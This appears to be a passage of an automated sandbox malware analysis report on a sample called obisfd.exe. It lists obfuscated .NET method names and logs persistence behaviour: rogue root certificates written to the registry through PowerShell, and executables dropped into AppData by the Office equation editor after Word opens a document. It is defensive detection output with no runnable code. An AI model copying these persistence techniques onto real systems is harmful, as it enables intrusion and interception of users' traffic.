                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, ixMUegJB669oosM1rc.csHigh entropy of concatenated method names: 'qhgcaaujr7', 'byFcRdH8Fq', 'gFycdtWgNF', 'BZycIKlDca', 'QtYc8Kn8dF', 'YTXcLt3vXc', 'U3pcPfC1ye', 'N5SAwQLEVx', 'XLIAEbCRAM', 'OISAi0WmIP'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, CTFYYSwldjLLtdLFTJ.csHigh entropy of concatenated method names: 'fgO85qhsVT', 'IEA89dMfFv', 'GTZ8XEjGGB', 'hoK8SlLafS', 'tUS8xN603L', 'i6U80faeV1', 'cKx8w8Q4cb', 'ltU8E9onNc', 'lYv8i0JlvO', 'k2d8eymfuK'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, nisEPcnW8SFm6Q8jGV.csHigh entropy of concatenated method names: 'O8I16mvZD9', 'Qm31Y3iMjh', 'Hv61s6mK2m', 'XRG1DcssA3', 'MNh1t36X5i', 'E2K1MSG9E4', 'jUR1U4Wqr8', 'DBJ1HfjTew', 'H3C1QHZ96v', 'Ybm1omOvki'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, drVBwe0HB5eHSObKlH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oN6liKSs7E', 'OGOledTZ8a', 'GG6lzkQMU1', 'c3dR7ATRPF', 'wScRa8HfFy', 'ng0Rl0shel', 'TvqRRgEBTa', 'SOQeM6Fnlvh3BJDCI3A'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, RDvQApZfaEZ3ekZ6hi.csHigh entropy of concatenated method names: 'ToString', 'TbIGvVhtld', 'uqOGgipZJi', 'PocG3k3kA9', 'GFCGWu861G', 'l1tGT41Uaj', 'u18GhRdLyA', 'sYcGB2FBE3', 'SfdGJMH52I', 'RwoGmKropx'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, GIvqWG73ShWIBwRXj9.csHigh entropy of concatenated method names: 'PZKa1FZbeO', 'u2narsv7TE', 'qiGaZKiceD', 'tdNaN9c3P1', 'SGTajEVaKk', 'dAIaGlRwAw', 'MsYgUvjJIeSk5xKNAo', 'T0NsXNGiYRtDkjpVmT', 'sOEaaXU7wY', 'qMSaRS6XSa'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, a9D6tHXAVfLQ7AVvAh.csHigh entropy of concatenated method names: 'lTIjukLRw2', 'kN0jFOxnNo', 'kRFj50PJSR', 'mPBj9aTjVa', 'IC6jgovihg', 'WV8j3cD8pJ', 'mJFjWMRiLb', 'fl4jTM6Mdx', 'HRZjhPZB24', 'J4KjBATO2s'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, LXDrUhKsbsaSdMig3u.csHigh entropy of concatenated method names: 'OPZyD3UAjy', 'i75yMgkPHn', 'sMmyHcXLdH', 'GjJyQBMWQd', 'VPKyj9mUPr', 'JctyGwbVDI', 'e2ny4v6TSu', 'YcmyAalwbG', 'vdMycuFFJd', 'FrcyC6GDRS'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, V9JX8gvNK4hEI9Xqap.csHigh entropy of concatenated method names: 'FIyRKHyJR1', 'hM2RIUXoZx', 'PSiR8a7umL', 'XhfRyJBTFP', 'ARCRLUKfoI', 'vm9RPnFoah', 'fg9R1dLMvI', 'mAGRrnihkU', 'VMtRp4qlZL', 'FMbRZBVBte'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, QVjhpwcQk0xIgItUxU.csHigh entropy of concatenated method names: 'ExfqH6Ecbu', 'dULqQCZuDi', 'm9UqkZukWK', 'EEQqgY9cEc', 'hEJqW2agov', 'boKqTofQ4g', 'qAiqBXkPDl', 'llBqJjBR97', 'NsvquSm4Yw', 'yHtqvcDg9F'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, nuWOm92koeAgoyXSGZ.csHigh entropy of concatenated method names: 'dxc6fbR9trHoKxZZu1k', 'TEuXWnRflFgmExBRCdO', 'L5OPAutpGf', 'R5MPcaMO0b', 'NPhPCDJcwl', 'mS18SrRbJ4IwiOons2F', 'xBYE4YRNbDGfimWUgIh'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, iQc3ChMdCJOJTr7QxW.csHigh entropy of concatenated method names: 'UMts3tc6O', 'D7pDZ7QkB', 'i9MMOxNE6', 'VvsUd3jKp', 'dngQrkLnt', 'orroTtrdC', 'an9rxLqlcPikeyW33Y', 'meJGqB246S5snqtB8X', 'sAqA293U5', 'TJgCd9Iuq'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, Ik0n13sPA6S1MPxvXW.csHigh entropy of concatenated method names: 'INFPKOe4yM', 'plPP8wtZqd', 'AuSPLeToWk', 'QFPP1fgNZL', 'V7KPr3BZTc', 's3oLxQOtg6', 'QlIL03bIyL', 'fQQLweeTg0', 'r8CLEYX9tV', 'iI7LidLL7P'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, tSHRJ9Ykvh9h1q7IY5g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u9qC5Gehl4', 'jxEC9TDkp8', 'XpWCXjdDNO', 't0rCSiZRGE', 'zL3CxSiVpn', 'DJeC0PwRqi', 'wUuCwYHxTo'
                Source: 5.2.obisfd.exe.4c10000.7.raw.unpack, WJt0PY4tr3EXWlCgiy.csHigh entropy of concatenated method names: 'Dispose', 'mfdaind5Q2', 'hyolgvCPxm', 'Lvb22g9wVe', 'YtdaewiR5E', 'iIwazEOTGn', 'ProcessDialogKey', 'NjKl79amdT', 'npelaPZbjW', 'OpCllD0FVI'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, mm6tSkHBXiT9hApjPn.csHigh entropy of concatenated method names: 'UxS4EUORUj', 'fQH4eZItGc', 'EiQA73H0hP', 'MmdAaIohye', 'G8K4vQhJSL', 'kCo4F4WUd9', 'sfX4fJKKEh', 'K9A45P7IBS', 'SaK49MAKae', 'WbJ4X9nA5P'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, WptP8nY308ucvUe10D4.csHigh entropy of concatenated method names: 'bfBc61ZYFa', 'qvtcY4Zrwe', 'AGAcs5kDdd', 'GmwcDVHDqu', 'YqYctmTAgw', 'gfkcMRpWZZ', 's7ocUgFpat', 'KxTcHdkXah', 'iEWcQaM4iU', 'Rc8co1JJJd'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, QDA4wYAQtjtLDuMu1u.csHigh entropy of concatenated method names: 'ed6AIbclgZ', 'efTA8EeHcJ', 'g0mAyX5JAR', 'FoKALNCQml', 'aA6APtHBnn', 'ovOA1IFQx8', 'K8ZArDBY68', 'EPYApIONqr', 'mvEAZqkwWA', 'TY1ANasOKR'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, Y0I6CkI3xEBkKXRjRu.csHigh entropy of concatenated method names: 'FBh1Isd70j', 'FCD1y5vh6B', 'H7l1PTGNTf', 'Sk3PeABOE6', 'KQVPzQ6Ynf', 'VLY17jjmK0', 'AQ91aIdtbc', 'eMq1lFEngE', 'oX21Rxffeo', 'dKL1dUldyd'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, YMIMiHg8npgvZDB1j3.csHigh entropy of concatenated method names: 'oVZAkjsgTR', 'MBWAgM2Gsa', 'eG0A3MpaQc', 'oXQAW4PB5M', 'VDPA55KDjj', 'VQbAT3ZeVi', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, ixMUegJB669oosM1rc.csHigh entropy of concatenated method names: 'qhgcaaujr7', 'byFcRdH8Fq', 'gFycdtWgNF', 'BZycIKlDca', 'QtYc8Kn8dF', 'YTXcLt3vXc', 'U3pcPfC1ye', 'N5SAwQLEVx', 'XLIAEbCRAM', 'OISAi0WmIP'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, CTFYYSwldjLLtdLFTJ.csHigh entropy of concatenated method names: 'fgO85qhsVT', 'IEA89dMfFv', 'GTZ8XEjGGB', 'hoK8SlLafS', 'tUS8xN603L', 'i6U80faeV1', 'cKx8w8Q4cb', 'ltU8E9onNc', 'lYv8i0JlvO', 'k2d8eymfuK'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, nisEPcnW8SFm6Q8jGV.csHigh entropy of concatenated method names: 'O8I16mvZD9', 'Qm31Y3iMjh', 'Hv61s6mK2m', 'XRG1DcssA3', 'MNh1t36X5i', 'E2K1MSG9E4', 'jUR1U4Wqr8', 'DBJ1HfjTew', 'H3C1QHZ96v', 'Ybm1omOvki'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, drVBwe0HB5eHSObKlH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oN6liKSs7E', 'OGOledTZ8a', 'GG6lzkQMU1', 'c3dR7ATRPF', 'wScRa8HfFy', 'ng0Rl0shel', 'TvqRRgEBTa', 'SOQeM6Fnlvh3BJDCI3A'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, RDvQApZfaEZ3ekZ6hi.csHigh entropy of concatenated method names: 'ToString', 'TbIGvVhtld', 'uqOGgipZJi', 'PocG3k3kA9', 'GFCGWu861G', 'l1tGT41Uaj', 'u18GhRdLyA', 'sYcGB2FBE3', 'SfdGJMH52I', 'RwoGmKropx'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, GIvqWG73ShWIBwRXj9.csHigh entropy of concatenated method names: 'PZKa1FZbeO', 'u2narsv7TE', 'qiGaZKiceD', 'tdNaN9c3P1', 'SGTajEVaKk', 'dAIaGlRwAw', 'MsYgUvjJIeSk5xKNAo', 'T0NsXNGiYRtDkjpVmT', 'sOEaaXU7wY', 'qMSaRS6XSa'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, a9D6tHXAVfLQ7AVvAh.csHigh entropy of concatenated method names: 'lTIjukLRw2', 'kN0jFOxnNo', 'kRFj50PJSR', 'mPBj9aTjVa', 'IC6jgovihg', 'WV8j3cD8pJ', 'mJFjWMRiLb', 'fl4jTM6Mdx', 'HRZjhPZB24', 'J4KjBATO2s'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, LXDrUhKsbsaSdMig3u.csHigh entropy of concatenated method names: 'OPZyD3UAjy', 'i75yMgkPHn', 'sMmyHcXLdH', 'GjJyQBMWQd', 'VPKyj9mUPr', 'JctyGwbVDI', 'e2ny4v6TSu', 'YcmyAalwbG', 'vdMycuFFJd', 'FrcyC6GDRS'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, V9JX8gvNK4hEI9Xqap.csHigh entropy of concatenated method names: 'FIyRKHyJR1', 'hM2RIUXoZx', 'PSiR8a7umL', 'XhfRyJBTFP', 'ARCRLUKfoI', 'vm9RPnFoah', 'fg9R1dLMvI', 'mAGRrnihkU', 'VMtRp4qlZL', 'FMbRZBVBte'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, QVjhpwcQk0xIgItUxU.csHigh entropy of concatenated method names: 'ExfqH6Ecbu', 'dULqQCZuDi', 'm9UqkZukWK', 'EEQqgY9cEc', 'hEJqW2agov', 'boKqTofQ4g', 'qAiqBXkPDl', 'llBqJjBR97', 'NsvquSm4Yw', 'yHtqvcDg9F'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, nuWOm92koeAgoyXSGZ.csHigh entropy of concatenated method names: 'dxc6fbR9trHoKxZZu1k', 'TEuXWnRflFgmExBRCdO', 'L5OPAutpGf', 'R5MPcaMO0b', 'NPhPCDJcwl', 'mS18SrRbJ4IwiOons2F', 'xBYE4YRNbDGfimWUgIh'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, iQc3ChMdCJOJTr7QxW.csHigh entropy of concatenated method names: 'UMts3tc6O', 'D7pDZ7QkB', 'i9MMOxNE6', 'VvsUd3jKp', 'dngQrkLnt', 'orroTtrdC', 'an9rxLqlcPikeyW33Y', 'meJGqB246S5snqtB8X', 'sAqA293U5', 'TJgCd9Iuq'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, Ik0n13sPA6S1MPxvXW.csHigh entropy of concatenated method names: 'INFPKOe4yM', 'plPP8wtZqd', 'AuSPLeToWk', 'QFPP1fgNZL', 'V7KPr3BZTc', 's3oLxQOtg6', 'QlIL03bIyL', 'fQQLweeTg0', 'r8CLEYX9tV', 'iI7LidLL7P'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, tSHRJ9Ykvh9h1q7IY5g.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u9qC5Gehl4', 'jxEC9TDkp8', 'XpWCXjdDNO', 't0rCSiZRGE', 'zL3CxSiVpn', 'DJeC0PwRqi', 'wUuCwYHxTo'
                Source: 5.2.obisfd.exe.38c2d10.3.raw.unpack, WJt0PY4tr3EXWlCgiy.csHigh entropy of concatenated method names: 'Dispose', 'mfdaind5Q2', 'hyolgvCPxm', 'Lvb22g9wVe', 'YtdaewiR5E', 'iIwazEOTGn', 'ProcessDialogKey', 'NjKl79amdT', 'npelaPZbjW', 'OpCllD0FVI'

                Persistence and Installation Behavior

                barindex
                Installs new ROOT certificates
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\6FfzLi8FyhIIqWu[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obisfd.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\obisfd.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
